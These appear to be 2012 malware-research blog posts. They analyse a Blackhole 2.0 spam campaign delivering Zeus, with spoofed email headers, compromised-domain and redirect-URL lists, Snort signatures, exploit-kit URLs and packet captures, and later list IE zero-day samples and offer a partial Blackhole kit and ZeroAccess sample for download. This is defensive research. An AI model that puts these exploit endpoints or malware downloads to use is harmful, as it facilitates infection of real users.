Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 7bit
================================================================================================================================
Received: from [27.0.100.150] ([27.0.100.150]) by xxxxxxxxxx199.xxxxxxxxxx148.13]) with SMTP;
Received: from [45.139.97.41] (helo=zqbksulszcqp.hagsxueccl.net)
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Subject: ADP Invoice Reminder
Date: Mon, 10 Sep 2012 21:45:49 +0600
MIME-Version: 1.0
Content-Type: multipart/alternative;
X-Priority: 3
X-Mailer: jxfnsip 93
Message-ID: <9542918508 data-blogger-escaped-.4w72rmn8957341=".4w72rmn8957341" data-blogger-escaped-aceab.upvemmonfxej.com="aceab.upvemmonfxej.com">
------=_kwsdyv_60_26_78
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable
================================================================================================================================
Received: from [193.138.153.55] ([193.138.153.55]) byxxxxxxxxxx148.13]) with SMTP;
Received: from apache by adp.com with local (Exim 4.63)
Subject: ADP Invoice Reminder
Date: Mon, 10 Sep 2012 16:45:46 +0100
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Message-ID: <401fcaec045823fbd91776a54c3b4725 data-blogger-escaped-adp.com="adp.com">
X-Priority: 3
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
MIME-Version: 1.0
Content-Type: multipart/alternative;
================================================================================================================================
Received: from [89.253.172.26] ([89.253.172.26]) by xxxxxxxxxx212.xxxxxxxxxx148.13]) with SMTP;
Received: from [53.29.118.157] (helo=aidkjiedg.okffgowvjjcm.tv)
Date:
From:
X-Mailer: The Bat! (v3.5) Educational
X-Priority: 3 (Normal)
Message-ID: <3111556318 data-blogger-escaped-.lzwloeh3671668=".lzwloeh3671668" data-blogger-escaped-dscjjswmplopvu.dpqxpkno.com="dscjjswmplopvu.dpqxpkno.com">
Subject: ADP Invoice Reminder
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----------01174D1F41DF4C"
------------01174D1F41DF4C
Content-Type: text/plain; charset=windows-1250
Content-Transfer-Encoding: 7bit

List of X-Mailers (from 50 messages)

X-Mailer: cpljdp 25
X-Mailer: cqvfxraq 46
X-Mailer: enqutxo 58
X-Mailer: feait-32
X-Mailer: hrvqejekrr 87
X-Mailer: jnhrtzn-29
X-Mailer: jxfnsip 93
X-Mailer: nluigh_88
X-Mailer: PHP
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
X-Mailer: qkhoovc_04
X-Mailer: qlywgmzna.54
X-Mailer: qocrg 51
X-Mailer: The Bat! (v2.00.18) Business
X-Mailer: The Bat! (v2.00.5) Educational
X-Mailer: The Bat! (v2.00.5) Personal
X-Mailer: The Bat! (v2.01) Business
X-Mailer: The Bat! (v3.0.0.15) Home
X-Mailer: The Bat! (v3.5) Educational
X-Mailer: The Bat! (v3.5.25) Professional
X-Mailer: The Bat! (v3.51.10) Professional
X-Mailer: The Bat! (v3.71.01) Home
X-Mailer: The Bat! (v3.81.14 Beta) Home
X-Mailer: unrhtqp 61
X-Mailer: uvttp 88
X-Mailer: wlbyzidlja 13
X-Mailer: wyxmmpcmw_06
X-Mailer: xifywauon_33
X-Mailer: zckimbfsi 31
X-Mailer: ztqttspoqo.26
X-PHP-Script: adp.com/sendmail.php for 178.91.24.25
X-PHP-Script: adp.com/sendmail.php for 197.0.127.4
X-PHP-Script: adp.com/sendmail.php for 50.20.84.34

"Content type" variants (depends on the mailing software on the sending computer)

------------=_1348015405-19759-15
------=_addfge_56_00_60
------=_dngv_71_64_28
------=_dpohbb_97_28_15
------=_dveura_43_69_04
------=_goqxpvebp_47_73_18
------=_iubkqawcfu_82_91_90
------=_jtumdemziq_25_26_54
------=_kwsdyv_60_26_78
------=_mrdcr_81_15_31
------=_rogdop_61_77_16
------=_ryxrfrsyk_93_92_50
------=_vbkayah_83_23_59
------=_zfejdxzc_63_04_85
------=_zkitvmggp_11_95_41
boundary="----------01174D1F41DF4C"
boundary="----------1F1A271284963E"
boundary="----------33C7A418F1A9DC6F"
boundary="----------33F1EFAEBAAB889"
boundary="----------514975CB08A4B6"
boundary="----------678AE86DB5F379B"
boundary="----------CD138B87CE9A363"
boundary="----------D1C1B698DAFC7B4"
boundary="------------01040400309010705020301"
boundary="------------01070100404080205010201"
boundary="------------02070100402010209030406"
boundary="------------06010700809080805040108"
boundary="------------07040500104020905030801"
boundary="------------07070600903010508070107"
boundary="------------09020200307030404040901"
------------01174D1F41DF4C
------------1F1A271284963E
------------33C7A418F1A9DC6F
------------33F1EFAEBAAB889
------------514975CB08A4B6
------------678AE86DB5F379B

List of some of the compromised domains

arksylhet.com
badshahpromotions.co.uk
centroedusantaterezinha.org
chambe-aix.com
colombianfashion.com
curatatorie-sibiu.ro
davidicke.pl
domaister.com
dpwparking.com
ecoaction21.fr
estetiqueroman.ro
fengshuitonight.com
ferretsac.com
firetowerguard.com
groupe-cmb.com
hmlanding.com
innovahogar.es
jusprev.org.br
justwebdesign.co.za
karpar.gr
lehoapaper.com
muzee.org
nailtaxi.com
onewaytransportproducts.com
sloanegroup.com
sv.thanmadailuc.com
trends-und-freizeit.de
ukhs.dk
wnyportal.com
www.golfer360.de

URLs in spam messages redirecting to the exploit kit

http://arksylhet. com/A67iD4eo/index. html
http://arksylhet. com/QSpUShbL/index. html
http://badshahpromotions. co. uk/zpVjiR/index. html
http://centroedusantaterezinha. org/foRHmF8/index. html
http:///Wjn56cM6/index. html
http://chambe-aix. com/yCkWRN/index. html
http://chambe-aix. com/yYiD9SAs/index. html
http://colombianfashion. com/Mt1T26/index. html
http://curatatorie-sibiu. ro/fbwoGoYB/index. html
http://curatatorie-sibiu. ro/QeHis8s/index. html
http://davidicke. pl/0qaSfRv/index. html
http://davidicke. pl/mZbkMz/index. html
http://davidicke. pl/x1s0xB8z/index. html
http://domaister. com/LD2nAc/index. html
http://dpwparking. com/PYG35et/index. html
http://ecoaction21. fr/QBA8Re4S/index. html
http://estetiqueroman. ro/KD31RjXc/index. html
http://fengshuitonight. com/JTARZz/index. html
http://fengshuitonight. com/vRNXQq/index. html
http://ferretsac. com/wBbsvpF/index. html
http://ferretsac. com/wc4hACm/index. html
http://ferretsac. com/z7ShYa3/index. html
http://firetowerguard. com/AEuifWY/index. html
http://groupe-cmb. com/JWBpK7qd/index. html
http://groupe-cmb. com/ukKmLYf0/index. html
http://groupe-cmb. com/zc0XNMxZ/index. html
http://hmlanding. com/60QuVZQ/index. html
http://innovahogar. es/4oRnMr/index. html
http://innovahogar. es/V2dSnzdv/index. html
http://innovahogar. es/ZUCufHc/index. html
http://jusprev. org. br/aZhDGJ1e/index. html
http://justwebdesign. co. za/X1dWrR/index. html
http://karpar. gr/mMDBNKhE/index. html
http://karpar. gr/yoTkZUm0/index. html
http://karpar. gr/yUyj1crG/index. html
http://lehoapaper. com/hUvbnijs/index. html
http://muzee. org/AA9njNS/index. html
http://nailtaxi. com/yjgSuE/index. html
http://onewaytransportproducts. com/auVejpR/index. html
http://sloanegroup. com/1n70Gvt/index. html
http://sv. thanmadailuc. com/9vy1FW/index. html
http://sv. thanmadailuc. com/UotPEhM/index. html
http://sv. thanmadailuc. com/x4MSyKCz/index. html
http://trends-und-freizeit. de/4UDFo4/index. html
http://ukhs. dk/ZjUP5CCZ/index. html
http://wnyportal. com/cKodnh/index. html
http://justwebdesign. co. za/X1dWrR/index. html

In this particular case, these Snort signatures alerted about the spam arrival.

SOURCEFIRE SNORT
alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"EXPLOIT-KIT Blackhole possible email Landing to 8 chr folder"; flow:to_server,established; content:"href=|22|http|3A 2F 2F|"; content:"/index.html|22|"; within:50; pcre:"/\x2f[a-z0-9]{8}\x2findex\.html\x22/msi"; metadata:policy balanced-ips drop, policy security-ips drop, service smtp; classtype:trojan-activity; sid:24171; rev:1; )

EMERGING THREATS
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS Possible Blackhole Landing to 8 chr folder plus index.html"; flow:established,to_server; content:"/index.htm"; fast_pattern:only; http_uri; urilen:20<>21; content:!"search"; nocase; http_uri; pcre:"/^\/[A-Za-z0-9]+[A-Z]+[A-Za-z0-9]*\/index\.html?$/U"; classtype:bad-unknown; sid:2014521; rev:4;)

Exploit kit URL/IP

The links redirect to

69. 194. 193. 34/links/systems-warns. php - used in emails above
46. 249. 37. 122/links/systems-warns. php - found on internet

As the Blackhole Kit 2.0 ad promises, the actual exploit links are dynamically generated and usable only once and expire and probably will be difficult to predict

Our case:
69.194.193.34/links/systems-links_warns.php?ljpcwedu=0206360203&unnioab=41&phjf=35353306040934370b06&jct=0b0006000200030b07 << PDF exploit

69.194.193.34/systems-links_warns.php?nfezhok=0906343704&sbipbq=3dzz7ecg=35353306040934370b06&qara=0b0007000400040b07 < << PDF exploit ( second test)

69.194.193.34/links/systems-links_warns.php?tf=0206360203&le=35353306040934370b06&i=02&jy=b&fg=h << Java exploit

Compare to links by a different actor described by Kafeine http://malware.dontneedcoffee.com/2012/09/BHEK2.0landing.html

http://46.249.37.118 /links/differently-trace.php?
zexl=36070905070437020234050505343634353405060636060a330902340a033505

Blackhole 2.0 now has the following exploits

CVE-2006-5559 MDAC - still works well on IE6 (listed in the ad)
CVE-2012-0507 Java Atomic (listed in the ad)
CVE-2012-1723 - Java Byte (listed in the ad)
CVE-2010-0188 - PDF Libtiff (listed in the ad)
CVE-2012-4681 (seen in the wild)

The last version of 1.x is 1.2.5 (released Aug.30, 2012 with CVE-2012-4681 added later), it still has all the older exploits plus

CVE-2012-1889 - IE XML
CVE-2012-1723 - Java
CVE-2012-4681 - Java
CVE-2010-0188 - PDF Libtiff
3 older PDF exploits for v. < 8.0
CVE-2006-5559 MDAC
CVE-2010-1885 - HCP
CVE-2011-0559 -Flash + 1 more older unspecified Flash CVE
CVE-2011-2110 - Flash

The main landing page

The classic WAIT PLEASE

CVE-2012-0507

Screenshots of some of the legitimate compromised websites

Traffic

Download the full pcap file above

GET /data/java.jar.pack.gz HTTP/1.1

accept-encoding: pack200-gzip, gzip

content-type: application/x-java-archive

Cache-Control: no-cache

Pragma: no-cache

User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06

Host: 69.194.193.34

Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2

Connection: keep-alive

If-Modified-Since: Tue, 18 Sep 2012 07:17:22 GMT

HTTP/1.1 404 Not Found

Server: nginx/0.7.67

Date: Wed, 19 Sep 2012 02:42:18 GMT

Content-Type: text/html

Connection: keep-alive

Content-Length: 162

GET /links/systems-links_warns.php?ljpcwedu=0206360203&unnioab=41&phjf=35353306040934370b06&jct=0b0006000200030b07 HTTP/1.1

Host: 69.194.193.34

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 115

Connection: keep-alive

Referer: http://69.194.193.34/links/systems-links_warns.php

HTTP/1.1 200 OK

Server: nginx/0.7.67

Date: Wed, 19 Sep 2012 02:41:57 GMT

Content-Type: application/pdf

Connection: keep-alive

Content-Length: 18637

X-Powered-By: PHP/5.3.14-1~dotdeb.0

Accept-Ranges: bytes

Content-Disposition: inline; filename=ef177.pdf

%PDF-1.6

%....

52 0 obj<</Length 42/Root 1 0 R/Info 3 0 R/Filter/FlateDecode/W[1 2 1]/Index[5 1 7 1 9 4 23 4 50 3]>>stream

x.bbb0b`b```.G0.....!...w.310Z...2....w...

endstream

endobj

TCP TRAFFIC HOSTS

92.43.108.70 80 Germany AS33891 Core-Backbone GmbH
84.246.225.142 80 France AS34274 ELBMULTIMEDIA ELB MULTI
74.125.132.104 80 United States AS15169 Google Inc.
74.125.132.94 80 United States AS15169 Google Inc.
89.106.12.145 80 Turkey AS39582 Grid Bilisim Teknolojil
64.71.131.88 80 United States AS6939 Hurricane Electric
112.78.2.145 80 Vietnam AS45538 Online data services
216.246.98.78 80 United States AS23352 Server Central Network
69.194.193.34 80 United States AS14670 Solar VPS
174.121.152.5 80 United States AS21844 ThePlanet.com Internet
199.7.54.190 80 United States AS36624 VeriSign Global Registr
199.7.52.190 80 United States AS36620 VeriSign Global Registr
63.245.217.81 443 United States AS53371 Mozilla Corporation
213.155.112.85 8080 Turkey AS8685 Doruk Iletisim ve Otomas
89.40.119.200 11611 Romania AS41950 NETLOG COMPUTER SRL
190.69.173.62 11781 Colombia AS3816 TELECOMUNICACIONES S.A.
72.248.245.188 16999 United States AS14751 One Communications Corp
89.69.109.243 17681 Poland AS6830 UPC Broadband Holding B.
109.234.114.78 24862 Georgia AS47921 LUNET LLC
178.163.88.81 27000 Russian Federation AS8416 Infoline Ltd.

UDP TRAFFIC HOSTS

Address Port Bytes Country AS Number ISP
182.72.166.6 29984 125 India AS9498 BHARTI Airtel Ltd. Bharti Broadband
85.107.181.118 17648 127 Turkey AS9121 Turk Telekomunikasyon An Turk Telekom
63.254.227.46 23466 128 United States AS22663 Prominic.NET Inc.
83.93.226.168 28233 141 Denmark AS3292 TDC Data Networks Tele Danmark
79.0.8.195 24612 145 Italy AS3269 Telecom Italia S.p.a. Telecom Italia
222.128.254.2 23311 156 China AS4808 CNCGROUP IP network Chin China Unicom Beijing province n
12.96.109.50 11088 160 United States AS7018 AT&T Services Inc.
186.39.132.44 12878 163 Argentina AS22927 Telefonica de Argentina Telefonica de Argentina
192.168.106.131 1076 168 - - -
82.59.154.81 17335 169 Italy AS3269 Telecom Italia S.p.a. Telecom Italia
113.166.213.7 11378 173 Vietnam AS45899 VNPT Corp VDC
68.170.61.220 20328 176 United States AS10835 Visionary Communication Visionary Communications
108.2.156.170 13246 178 United States AS19262 Verizon Online LLC Verizon Internet Services
72.230.166.215 27024 181 United States AS11351 Road Runner HoldCo LLC Road Runner
27.108.211.115 18136 181 Philippines AS6648 Bayan Telecommunications Bayan Telecommunications
207.255.157.162 13889 186 United States AS11776 Atlantic Broadband Fina Atlantic Broadband
64.53.221.153 14187 194 United States AS29859 WideOpenWest Finance LL WideOpenWest
123.20.196.85 11297 195 Vietnam AS45899 VNPT Corp VDC
110.55.5.191 24922 196 Philippines AS6648 Bayan Telecommunications Bayan Telecommunications Incorp
192.168.106.131 1079 202 - - -
95.10.33.213 15718 207 Turkey AS9121 Turk Telekomunikasyon An Turk Telekom
201.62.128.19 21593 210 Brazil AS23106 Empresa de Infovias S/A Way TV Belo Horizonte S.A.
151.74.71.172 29086 216 Italy AS1267 Infostrada S.p.A. WIND Telecomunicazioni S.p.A
114.42.67.39 18497 225 Taiwan AS3462 Data Communication Busin CHTD
37.206.138.114 18301 233 Italy AS3269 Telecom Italia S.p.a. Telecom Italia S.p.A.
92.114.119.237 11837 234 Romania AS6910 Dial Telecom S.R.L. Sc Digital Cable Systems SA
114.47.243.188 14796 238 Taiwan AS3462 Data Communication Busin CHTD
24.146.212.193 11451 247 United States AS6128 Cablevision Systems Corp Optimum Online
190.55.226.224 15258 268 Argentina AS27747 Telecentro S.A. Telecentro S.A. - Clientes Resi
119.242.125.198 11788 269 Japan AS2518 NEC BIGLOBE Ltd.
178.75.237.12 27584 275 Bulgaria AS42248 Vida Optics TVV Optilink Ltd
79.14.79.134 24815 275 Italy AS3269 Telecom Italia S.p.a. Telecom Italia
37.99.51.1 11968 277 Kazakhstan AS21299 ORBITA-PLUS Autonomous 2Day Telecom LLP
201.87.81.21 21611 279 Brazil AS19182 Rede Ajato Ltda Comercial Cabo TV S\343o Paulo
190.198.1.85 11450 287 Venezuela AS8048 Servicios Venezuela
180.192.185.36 28379 288 Philippines AS9497 Digital Telecommunicatio Digital Telecommunications Phil
68.63.130.33 17878 293 United States AS7922 Comcast Cable Communicat Comcast Cable
151.50.236.170 29034 296 Italy AS1267 Infostrada S.p.A. WIND Telecomunicazioni S.p.A
183.100.54.194 12623 298 Korea Republic of AS4766 Korea Telecom
176.223.54.156 23169 300 Romania AS6910 Dial Telecom S.R.L. Digital Cable Systems SA
93.221.69.29 19174 303 Germany AS3320 Deutsche Telekom AG Deutsche Telekom AG
37.45.214.205 17842 304 Belarus AS6697 Republican Association B Republican Association BELTELEC
67.77.243.4 28864 305 United States AS6222 Embarq Corporation Embarq Corporation
96.30.155.22 12299 306 Canada AS11260 EastLink EastLink
209.5.182.110 17494 310 Canada AS3602 Rogers Cable Communicati Rogers Cable
74.71.140.38 15029 310 United States AS11351 Road Runner HoldCo LLC Road Runner
67.65.147.74 11126 311 United States AS7132 AT&T Internet Services AT&T Internet Services
62.5.128.33 24761 312 Russian Federation AS8359 MTS MTS OJSC MTS OJSC
192.168.106.131 68 684 - - -
192.168.106.254 67 684 - - -
66.148.80.28 24833 821 United States AS14361 HopOne Internet Corpora HopOne Internet Corporation
195.169.125.228 29902 1356 Netherlands AS1103 SURFnet The Netherlands
66.148.64.18 24305 2021 United States AS14361 HopOne Internet Corpora HopOne Internet Corporation
194.94.127.98 25549 2219 Germany AS680 Verein zur Foerderung ein Verein zur Foerderung eines Deu
192.168.106.131 1325 2414 - - -
192.168.106.2 137 2586 - - -
192.168.106.131 137 2586 - - -
192.168.106.2 53 2784 - - -
108.217.233.48 16503 3272 United States AS7018 AT&T Services Inc.
72.248.245.188 28722 3365 United States AS14751 One Communications Corp One Communications Corporation
77.70.94.249 19923 3512 Bulgaria AS35141 Megalan - Autonomous Sy Megalan Network Ltd.
190.69.173.62 26145 3700 Colombia AS3816 TELECOMUNICACIONES S.A. COLOMBIA TELECOMUNICACIONES S.A
192.168.106.131 18707 30916 - - -

Payload - Zeus

Payload is the classic Zeus of the older version. You can download all the files above. See below a couple of slides from my May 2012 presentation showing the basic difference (there are several but this is the easiest to check) between Zeus Gameover and Citadel (Citadel as of May 2012 :) .

In our case, it created registry key
HKU\S-1-5-21-1715567821-1275210071-839522115-1004\Software\Microsoft\Windows\CurrentVersion\Run\{5A5943C0-5A07-AD41-0C12-888728E4AB95}: ""C:\Documents and Settings\Laura\Application Data\Wyyh\ycys.exe""

Wyyh\ycys.exe"

Deleting cookies

Deleted files

Automatic scans

https://www.virustotal.com/file/37d801882221dbc8f9da510e9531434ffb63faf61052c0263b658ca227b9a453/analysis/
SHA256:37d801882221dbc8f9da510e9531434ffb63faf61052c0263b658ca227b9a453
SHA1:4290441b2edc07c606ffb3b6407c6b7df99413f3
MD5:86946ec2d2031f2b456e804cac4ade6d
File size:32.2 KB ( 33010 bytes )
File name:86946ec2d2031f2b456e804cac4ade6d
File type:ZIP
Tags:cve-2012-4681 exploit zip
Detection ratio:11 / 43
Analysis date: 2012-09-18 23:35:03 UTC ( 6 hours, 13 minutes ago )
AhnLab-V3Java/Exploit.Gen20120918
ComodoUnclassifiedMalware20120918
EmsisoftExploit.Java.CVE-2012-4681!IK20120918
ESET-NOD32Java/Exploit.CVE-2012-4681.AM20120918
F-SecureExploit:Java/CVE-2012-4681.H20120919
IkarusExploit.Java.CVE-2012-468120120918
KasperskyHEUR:Exploit.Java.CVE-2012-4681.gen20120919
McAfeeJV/Exploit-Blacole!zip20120919
McAfee-GW-EditionJV/Exploit-Blacole.r20120918
SophosTroj/JavaDl-FC20120919
TrendMicro-HouseCallTROJ_GEN.F47V091820120919

Additional information
#exploit

http://69.194.193.34/links/systems-links_warns.php
http://69.194.193.34/data/java.jar
Posted 9 hours, 19 minutes ago by BornSlippy Useful (0) Not useful (0) Abuse (0)
seem via URLS in spam
hxxp://conteruns.com/fix/Gam.jar
hxxp://afternewvision.net/fix/Gam.jar

https://www.virustotal.com/file/0e80aa63d9069f8325ed4d66327270a8c063fe94485e5266c0bb2eb117fe2e05/analysis/1348033795/
Zbot - MD5 will change with each run

SHA256:0e80aa63d9069f8325ed4d66327270a8c063fe94485e5266c0bb2eb117fe2e05
File name:diJPN.exe
Detection ratio:9 / 43
Analysis date: 2012-09-19 05:49:55 UTC ( 0 minutes ago )
BitDefenderTrojan.Generic.KD.73199320120919
EmsisoftTrojan.Win32.Zbot!A220120919
F-SecureTrojan.Generic.KD.73199320120919
GDataTrojan.Generic.KD.73199320120919
KasperskyTrojan-Spy.Win32.Zbot.exnj20120919
McAfeePWS-Zbot.gen.amk20120919
McAfee-GW-EditionPWS-Zbot.gen.amk20120919
SophosTroj/DwnLdr-KFF20120919
SymantecSuspicious.Cloud.520120919

Additional information
ssdeep
6144:59LMYYoC3oI3XKASU/jIddf1LgRfqLbjm8JlXkK6dCEwUCitW1RUWFM:5SiRAZ/jcdu9qL/m8JlXiHw8
TrID
Win32 Executable Generic (42.3%)
Win32 Dynamic Link Library (generic) (37.6%)
Generic Win/DOS Executable (9.9%)
DOS Executable Generic (9.9%)
VXD Driver (0.1%)
ExifTool
CodeSize.................: 10752
SubsystemVersion.........: 4.0
InitializedDataSize......: 325632
ImageVersion.............: 1.0
ProductName..............:
FileVersionNumber........: 1.1.1.42
UninitializedDataSize....: 1024
LanguageCode.............: French (Swiss)
FileFlagsMask............: 0x0000
CharacterSet.............: Windows, Latin1
LinkerVersion............: 2.56
OriginalFilename.........:
MIMEType.................: application/octet-stream
Subsystem................: Windows GUI
FileVersion..............:
TimeStamp................: 2012:09:18 09:04:59-07:00
FileType.................: Win32 EXE
PEType...................: PE32
InternalName.............:
ProductVersion...........:
FileDescription..........:
OSVersion................: 4.0
FileOS...................: Unknown (0)
LegalCopyright...........:
MachineType..............: Intel 386 or later, and compatibles
CompanyName..............:
LegalTrademarks..........:
FileSubtype..............: 0
ProductVersionNumber.....: 1.1.1.42
EntryPoint...............: 0x1240
ObjectFileType...........: Executable application
Sigcheck
publisher................:
product..................:
internal name............:
copyright................:
original name............:
file version.............:
description..............:
Portable Executable structural information
Compilation timedatestamp.....: 2012-09-18 16:04:59
Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x00001240

PE Sections...................:

Name Virtual Address Virtual Size Raw Size Entropy MD5
.text 4096 10308 10752 6.04 6bba50c1eac13adea8a339afc6faf36e
.data 16384 3328 3584 0.30 13aad2cc87311cfaa958fb13e3bd6798
.rdata 20480 307808 308224 7.97 84080c9735bea1e12ad86806e1b8f0dc
.bss 331776 544 0 0.00 d41d8cd98f00b204e9800998ecf8427e
.idata 335872 1700 2048 4.05 a5ffd9ab2a5a1127e2d1cbdf60d9cc2f
.rsrc 339968 664 1024 2.16 35dc6e0fa2ce4f92074e14bfae7347bf
qej 344064 4096 512 0.00 bf619eac0cdf3f68d496ea9344137e8b
ldc 348160 4096 4096 2.98 a214eafb14c8b08b14d9f92b22d97fac
ucd 352256 4096 512 0.00 bf619eac0cdf3f68d496ea9344137e8b
pmh 356352 4096 512 0.00 bf619eac0cdf3f68d496ea9344137e8b

PE Imports....................:

[[GDI32.dll]]
GetRegionData

[[KERNEL32.dll]]
CreatePipe, GetAtomNameA, CreateSemaphoreA, AddAtomA, Beep, SetUnhandledExceptionFilter, FindAtomA, GetStartupInfoA, ExitProcess, CreateFileA, GetCommandLineA, Sleep, GetModuleHandleA

[[msvcrt.dll]]
_cexit, __p__fmode, malloc, fopen, __p__environ, signal, strcmp, free, _onexit, atexit, abort, _setmode, __getmainargs, fprintf, fflush, _iob, sin, __set_app_type

[[ole32.dll]]
CoCreateGuid, BindMoniker

[[ws2_32.dll]]
gethostbyname, getpeername

[[USER32.dll]]
GetMessageA, CreateWindowExA, LoadCursorA, LoadIconA, DispatchMessageA, ShowWindow, TranslateMessage, PostQuitMessage, DefWindowProcA, MessageBoxW, GetPropA, RegisterClassExA

PE Resources..................:

Resource type Number of resources
RT_VERSION 1

↧

CVE-2012-4969 Internet explorer 0day samples

September 19, 2012, 5:40 am

≫ Next: Blackhole 2 exploit kit (partial pack) and ZeroAccess (user-mode memory resident version)

≪ Previous: CVE-2012-4681 samples Original (APT) and Blackhole 2.0 (crime)

The Internet Explorer 0day aka now CVE-2012-4969, have been used in a "small number of targeted attacks". The new Internet Explorer Zero day technical details came out (eromang.zataz.com), the Metasploit module is out now too and the number will increase exponentially as soon as exploit pack authors add it to their arsenal, which will happen very soon. This seems to be repeating the story of Java CVE-2012-4681. See CVE-2012-4681 samples Original (APT) and Blackhole 2.0 (crime)

There are a few mitigation workarounds you can use for now, the best is to upgrade your browser, however
Read more at http://technet.microsoft.com/en-us/security/advisory/2757760

CVE #

CVE-2012-4969
Use-after-free vulnerability in the CMshtmlEd::Exec function in mshtml.dll in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code via a crafted web site, as exploited in the wild in September 2012.

Download

Here are all the files mentioned by Jaime Blasco here
http://labs.alienvault.com/labs/index.php/2012/new-internet-explorer-zero-day-being-exploited-in-the-wild/

111.exe baabd0b871095138269cf2c53b517927
111.exe_out7173d9b331275b8be69a4e698c9ec68f
Decoded SWF e7ced808b16692f57229a2e21c476be8
exploit.html 4f1dfed17cf7d1a1d9f61e1ad2c03624
Moh2010.swf eb62e0051ad4ab3f626d148472dfa891
Protect.html f4537fe00e40b5bc01d9826dc3e0c2e8

Download all files above (email me if you need the password)

Automatic scans

https://www.virustotal.com/file/2a2e2efffa382663ba10c492f407dda8a686a777858692d073712d1cc9c5f265/analysis/

https://www.virustotal.com/file/a6086c16136ea752fc49bc987b8cc9e494384f372ddfdca85c2a5b7d43daa812/analysis/

https://www.virustotal.com/file/dd41efa629c7f7f876362c5ca6d570be6b83728a2ce8ecbef65bdb89cb402b0f/analysis/

https://www.virustotal.com/file/9d66323794d493a1deaab66e36d36a820d814ee4dd50d64cddf039c2a06463a5/analysis/

https://www.virustotal.com/file/70f6a2c2976248221c251d9965ff2313bc0ed0aebb098513d76de6d8396a7125/analysis/

https://www.virustotal.com/file/a5a04f661781d48df3cbe81f56ea1daae6ba3301c914723b0bb6369a5d2505d9/analysis/

https://www.virustotal.com/file/70f6a2c2976248221c251d9965ff2313bc0ed0aebb098513d76de6d8396a7125/analysis/1348057714/

↧

Blackhole 2 exploit kit (partial pack) and ZeroAccess (user-mode memory resident version)

October 4, 2012, 12:00 pm

≫ Next: An Overview of Exploit Packs (Update 17) October 12, 2012

≪ Previous: CVE-2012-4969 Internet explorer 0day samples

This post is an addtion to the DeepEnd Research post Blackhole & Cridex: Season 2 Episode 1: Intuit Spam & SSL traffic analysisby Andre DiMino about the Blackhole 2 exploit pack and Cridex trojan alliance.

Here is for download a partial Blackhole 2 exploit pack. This pack has been shared with me a few times over the past couple of weeks as researchers discovered an blackhole server with open directories. While it is missing a few crucial files, it is still provides insight into the pack components, exploits, and structure.

The list of files in the pack are listed below. 16 files are zero in size (not on purpose, that's all I have) and are there just for your information. The zero size files are listed in the separate list below (in addition to being in the main list). The files and data directories contain the exploits ( cve-2012-1723,cve-2012-0507, cve-2010-1885,cve-2012-4681, cve-2010-0188) and the payload (ZeroAccess among other malware, which is memory resident rootkit (thus no 'dropped', created files for ZeroAccess in the package, only the original dropper and all kinds of files genereated by the clickfraud component. Use Volatility or Redline/Memorize for analysis)
This captcha component of this pack was reviewed by
Behind the Captcha or Inside Blackhole Exploit Kit 2.0 - Exploit Kit Administration Panel (Malware Don't Need Coffee).

Malware Must Die analysts have been tracking Blackhole 2 as well

Download

Download Blackhole 2 exploit kit - partial pack ( email me if you need the password)
Download ZeroAccess sample with pcap ( email me if you need the password)

List of files

List of files

³ 554-0002.exe ³ api.php ³ autoupdate.php ³ bhadmin.php ³ bhadmin.php$%a=captcha ³ bhstat.php ³ config.php ³ cron_check.php ³ cron_checkdomains.php ³ cron_update.php ³ cron_updatetor.php ³ hole2.sql.gz ³ index.html ³ index.html$%C=D;O=A ³ index.html$%C=D;O=D ³ index.html$%C=M;O=A ³ index.html$%C=M;O=D ³ index.html$%C=N;O=A ³ index.html$%C=N;O=D ³ index.html$%C=S;O=A ³ index.html$%C=S;O=D ³ move_logs.php ³ data // CVE-2012-4681 // CVE-2012-1723 // cve-2010-0188 ³ index.html ³ index.html$%C=D;O=A ³ index.html$%C=D;O=D ³ index.html$%C=M;O=A ³ index.html$%C=M;O=D ³ index.html$%C=N;O=A ³ index.html$%C=N;O=D ³ index.html$%C=S;O=A ³ index.html$%C=S;O=D ³ java.jar ³ spn.jar ³ spn2.jar ³ t.pdf ³ dummy ³ index.html ³ index.html$%C=D;O=A ³ index.html$%C=D;O=D ³ index.html$%C=M;O=A ³ index.html$%C=M;O=D ³ index.html$%C=N;O=A ³ index.html$%C=N;O=D ³ index.html$%C=S;O=A ³ index.html$%C=S;O=D ³ files ³ 00d94b79b6 ³ 0da49e042d ³ 3fa7bdd7dc ³ fdc7aaf4a3 // ZeroAccess rootkit ³ file00d94b79b6 ³ file0da49e042d ³ file3fa7bdd7dc ³ filefdc7aaf4a3 ³ index.html ³ index.html$%C=D;O=A ³ index.html$%C=D;O=D ³ index.html$%C=M;O=A ³ index.html$%C=M;O=D ³ index.html$%C=N;O=A ³ index.html$%C=N;O=D ³ index.html$%C=S;O=A ³ index.html$%C=S;O=D ³ tmp.gz ³ icons ³ back.gif ³ blank.gif ³ compressed.gif ³ folder.gif ³ image2.gif ³ layout.gif ³ movie.gif ³ text.gif ³ unknown.gif ³ library ³ ³ browser.php ³ ³ data.dat ³ ³ db.php ³ ³ files.php ³ ³ index.html ³ ³ index.html$%C=D;O=A ³ ³ index.html$%C=D;O=D ³ ³ index.html$%C=M;O=A ³ ³ index.html$%C=M;O=D ³ ³ index.html$%C=N;O=A ³ ³ index.html$%C=N;O=D ³ ³ index.html$%C=S;O=A ³ ³ index.html$%C=S;O=D ³ ³ java.dat ³ ³ js.php ³ ³ lang.php ³ ³ logs.php ³ ³ sc.php ³ ³ template.php ³ ³ threads.php 